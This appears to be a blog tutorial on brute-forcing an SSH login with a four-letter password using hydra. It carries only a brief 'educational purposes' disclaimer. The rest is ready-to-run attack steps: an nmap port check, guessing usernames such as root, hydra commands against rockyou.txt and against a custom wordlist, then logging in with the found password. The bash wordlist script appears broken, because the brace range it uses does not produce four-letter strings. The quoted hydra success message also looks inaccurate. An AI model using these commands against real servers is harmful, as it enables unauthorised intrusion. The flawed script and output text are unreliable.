SSH Brute Force: 4-Letter Password

G5 Cyber Security

1 week ago

TL;DR

This guide shows you how to brute-force an SSH login with a password that’s only four letters long. It uses the hydra tool, which is common for this type of attack. Warning: Brute-forcing without permission is illegal and unethical. This information is for educational purposes only.

Prerequisites

A Linux machine (Kali Linux is ideal).
Root or sudo access.
The target SSH server’s IP address.

hydra installed. If not, install it with:

sudo apt update && sudo apt install hydra

Steps

Gather Information

Confirm the SSH service is running on port 22 (or another port if it’s been changed). You can use:
```
nmap -p 22 <target_ip>
```
Identify the username. Common usernames include ‘root’, ‘admin’, or a user you might know exists on the system.

Install hydra (if necessary)

As mentioned in prerequisites, use

sudo apt update && sudo apt install hydra

Run Hydra to Brute-Force the Password

Use the following command structure. Replace placeholders with your actual values:

hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target_ip> ssh

-l <username>: Specifies the username to attempt login with.
-P /usr/share/wordlists/rockyou.txt: Specifies the wordlist file containing potential passwords. rockyou.txt is a common, large password list. You may need to unzip it first:
```
gunzip rockyou.txt.gz
```
. If you don’t have this file, download one from the internet (be careful about malware!).
<target_ip>: The IP address of the target SSH server.
ssh: Specifies the service to attack (SSH).

For a 4-letter password, you can create a custom wordlist for faster results. A simple script could generate this:

#!/bin/bash
for i in {aaaa..zzzz};
do
echo $i
done > four_letters.txt

Then use that file with hydra:

hydra -l <username> -P four_letters.txt <target_ip> ssh

Monitor the Output

Hydra will attempt each password in the wordlist against the SSH server. Watch for a message indicating a successful login, like “[STATUS] 1 target successfully logged in”.

Stop Hydra and Log In

Once you have a valid password, press Ctrl+C to stop hydra. Then use ssh to log into the server using the username and password you discovered.

Important Considerations

Rate Limiting: SSH servers often implement rate limiting to prevent brute-force attacks. This can slow down or block your attempts.
Account Lockout: Some systems lock accounts after a certain number of failed login attempts.
Firewalls and Intrusion Detection Systems (IDS): These security measures may detect and block hydra’s activity.
Wordlist Choice: The effectiveness of the attack depends heavily on the quality of your wordlist. A larger, more relevant wordlist increases your chances of success but also takes longer to process.